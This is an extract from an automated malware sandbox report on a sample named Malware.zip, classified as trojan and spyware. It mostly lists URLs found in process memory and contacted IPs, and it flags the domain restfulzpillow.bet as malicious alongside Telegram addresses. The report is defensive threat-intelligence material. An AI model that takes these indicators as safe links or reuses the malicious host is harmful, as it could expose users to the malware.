                                  https://support.google.com/chrome/answer/6098869chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpfalse
                                    		high
                                    https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://docs.google.com/document/Jchrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 0000000D.00000002.2588822168.0000691400D28000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599149994.0000691401178000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.youtube.com/:chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://mail.google.com/mail/chrome.exe, 0000000D.00000002.2580103544.000069140099C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2596977075.0000691401070000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://mail.google.com/mail/:chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://support.google.com/chrome?p=desktop_tab_groupschrome.exe, 0000000D.00000003.1930976582.0000691400590000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://chrome.google.com/webstore?hl=enchrome.exe, 0000000D.00000002.2592575503.0000691400EB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2585385922.0000691400BBC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2587041056.0000691400C6C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2613155763.00006914018AC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://dns-tunnel-check.googlezip.net/connectchrome.exe, 0000000D.00000002.2598698110.0000691401150000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1chromecache_67.14.drfalse
                                                          		high
                                                          https://docs.google.com/document/:chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://mail.google.com/chat/download?usp=chrome_defaultchrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.com/tools/feedback/chrome/__submitchrome.exe, 0000000D.00000002.2569784819.0000691400444000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://mail.google.com/chat/chrome.exe, 0000000D.00000002.2580103544.000069140099C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2607546412.0000691401500000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599017524.000069140116C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://mail.google.com/mail/Jchrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://calendar.google.comchrome.exe, 0000000D.00000003.1932288737.0000691400605000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1931768505.000069140158E000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1929526429.0000691401604000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://unisolated.invalid/chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://drive.google.com/chrome.exe, 0000000D.00000002.2604043288.0000691401380000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://mail.google.com/chat/:chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrlchrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpfalse
                                                                              		high
                                                                              https://www.google.com/chrome/tips/chrome.exe, 0000000D.00000002.2586377952.0000691400C2C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599701490.00006914011AC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2589255460.0000691400D54000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://drive.google.com/?lfhs=2chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2607546412.0000691401500000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2574197738.0000691400798000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599017524.000069140116C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://ogs.google.com/widget/callout?eom=1chrome.exe, 0000000D.00000003.1968009878.0000691401DEC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://mail.google.com/chat/download?usp=chrome_default_defaultultchrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)chrome.exe, 0000000D.00000002.2576136209.0000691400804000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.youtube.com/s/notifications/manifest/cr_install.htmlchrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2596792163.0000691401060000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpfalse
                                                                                            		high
                                                                                            https://optimizationguide-pa.googchrome.exe, 0000000D.00000002.2565055950.0000691400190000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.youtube.com/?feature=ytcachrome.exe, 0000000D.00000002.2596977075.0000691401070000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2607546412.0000691401500000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.google.com/chrome/browser-tools/chrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.youtube.com/Jchrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://docs.google.com/forms/u/0/create?usp=chrome_actionschrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGAchrome.exe, 0000000D.00000002.2585522088.0000691400BC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611297831.0000691401804000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/mQchrome.exe, 0000000D.00000003.1885183663.00006910004D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://play.google.com/log?format=json&hasfast=truesyncdata.v1.AsyncDataService/GetAsyncDatachrome.exe, 0000000D.00000002.2543861158.000001B00DD57000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://support.google.com/chromebook?p=app_intentchrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpfalse
                                                                                                              		high
                                                                                                              https://docs.google.com/presentation/chrome.exe, 0000000D.00000002.2580103544.000069140099C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599017524.000069140116C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.google.com/tools/feedback/chrome/__submit99chrome.exe, 0000000D.00000002.2569784819.0000691400444000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://chromewebstore.google.com/category/themeschrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://chrome.google.com/webstorechrome.exe, 0000000D.00000003.1900763625.0000691401288000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/previewchrome.exe, 0000000D.00000003.1886045999.000069100055C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://chrome.google.com/webstore?hl=en&category=theme81https://myactivity.google.com/myactivity/?uchrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://support.google.com/chrome/answer/96817chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://myaccount.google.com/shielded-email?utm_source=chromechrome.exe, 0000000D.00000003.1885841225.0000691000540000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://myaccount.google.com/shielded-email?utm_source=chrome2Bchrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-kchrome.exe, 0000000D.00000002.2576680130.000069140083C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.google.com/chrome/#safechrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.youtube.com/chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.google.com/chrome/browser-features/chrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 0000000D.00000002.2594117821.0000691400F4C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581929231.0000691400A5C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2588822168.0000691400D28000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://plus.google.comchromecache_67.14.drfalse
                                                                                                                                                		high
                                                                                                                                                https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-kchrome.exe, 0000000D.00000002.2576680130.000069140083C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://docs.google.com/spreadsheets/chrome.exe, 0000000D.00000002.2596977075.0000691401070000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrlchrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://play.google.com/log?format=json&hasfast=truechromecache_69.14.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/2Jchrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=bchrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://m.google.com/devicemanagement/data/apichrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://docs.google.com/document/installwebapp?usp=chrome_defaultultchrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2602139949.00006914012C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://chromewebstore.google.com/chrome.exe, 0000000D.00000002.2565055950.0000691400190000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://chromewebstore.google.com/category/extensionschrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.google.com/chrome.exe, 0000000D.00000003.1900763625.0000691401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2610261143.00006914016C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://clients4.google.com/chrome-syncchrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://docs.google.com/document/chrome.exe, 0000000D.00000002.2579719052.0000691400974000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580103544.000069140099C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://gemini.google.com/app?q=chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://clients6.google.comchromecache_67.14.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://google.com/chrome.exe, 0000000D.00000002.2562242297.000069140008E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://t.me/Setup.exe, 0000000A.00000003.1828376706.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1867447694.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1828579447.00000000013BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://mail.google.com/mail/installwebapp?usp=chrome_defaultchrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://web.telegram.orgSetup.exe, 0000000A.00000003.1828339340.0000000003C6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://restfulzpillow.bet/bWijtSetup.exe, 0000000A.00000003.1867447694.0000000001402000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://docs.google.com/presentation/Jchrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://www.unicode.org/copyright.htmlchrome.exe, 0000000D.00000002.2493174113.000001B005E26000.00000002.00000001.00040000.0000000E.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591800891.0000691400E6C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2596792163.0000691401060000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://chrome.google.com/webstoreLDDiscoverchrome.exe, 0000000D.00000003.1900763625.0000691401292000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1900676282.000069140113C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1932134139.000069140114A000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1930172320.0000691401698000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1900763625.0000691401288000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://docs.google.com/document/installwebapp?usp=chrome_defaultchrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2602139949.00006914012C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://docs.google.com/presentation/:chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://docs.google.com/presentation/installwebapp?usp=chrome_defaultchrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://passwords.google.comSavedchrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://lens.google.com/gen204chrome.exe, 0000000D.00000003.1932288737.0000691400605000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1929526429.0000691401604000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://docs.google.com/spreadsheets/Jchrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://www.google.com/images/branding/product/ico/googleg_alldp.icoSetup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573256595.00006914006DC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://myactivity.google.com/chrome.exe, 0000000D.00000002.2587337302.0000691400C9C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1900834316.000069140129D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=bchrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://docs.google.com/spreadsheets/?usp=installed_webappchrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2604613278.00006914013C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573693016.0000691400708000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high

                                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                      149.154.167.99
                                                                                                                                                                                                                      		t.meUnited Kingdom
                                                                                                                                                                                                                      		62041TELEGRAMRUfalse
                                                                                                                                                                                                                      104.21.11.150
                                                                                                                                                                                                                      		restfulzpillow.betUnited States
                                                                                                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                      142.250.74.196
                                                                                                                                                                                                                      		www.google.comUnited States
                                                                                                                                                                                                                      		15169GOOGLEUSfalse

                                                                                                                                                                                                                      Private

                                                                                                                                                                                                                      IP
                                                                                                                                                                                                                      192.168.2.16
                                                                                                                                                                                                                      127.0.0.1

                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                      Analysis ID:1634564
                                                                                                                                                                                                                      Start date and time:2025-03-11 00:41:00 +01:00
                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                      Overall analysis duration:0h 6m 37s
                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                      Number of analysed new started processes analysed:18
                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                      Sample name:Malware.zip
                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                      Classification:mal76.troj.spyw.evad.winZIP@38/14@11/5
                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                      • Found application associated with file extension: .zip

                                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.186.142, 142.250.186.99, 142.250.186.174, 142.251.168.84, 142.250.185.110, 142.250.74.206, 142.250.185.163, 142.250.184.238, 142.250.186.74, 216.58.206.42, 172.217.18.106, 142.250.186.106, 142.250.185.138, 172.217.16.202, 142.250.185.202, 142.250.186.42, 142.250.185.170, 142.250.186.138, 142.250.185.106, 142.250.181.234, 216.58.212.170, 142.250.185.74, 172.217.18.10, 142.250.185.234, 142.250.184.202, 142.250.74.202, 142.250.186.170, 216.58.206.78, 142.250.185.238, 142.250.185.206, 23.60.203.209, 20.109.210.53
                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, clientservices.googleapis.com, ogads-pa.googleapis.com, clients.l.google.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com, optimizationguide-pa.googleapis.com
                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                      19:41:46API Interceptor1x Sleep call for process: OpenWith.exe modified
                                                                                                                                                                                                                      19:42:37API Interceptor3x Sleep call for process: Setup.exe modified

                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      149.154.167.99http://45.142.208.144.sslip.io/blog/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • telegram.org/img/emoji/40/F09F9889.png
                                                                                                                                                                                                                      http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • telegram.org/img/favicon.ico
                                                                                                                                                                                                                      http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • telegram.org/
                                                                                                                                                                                                                      http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
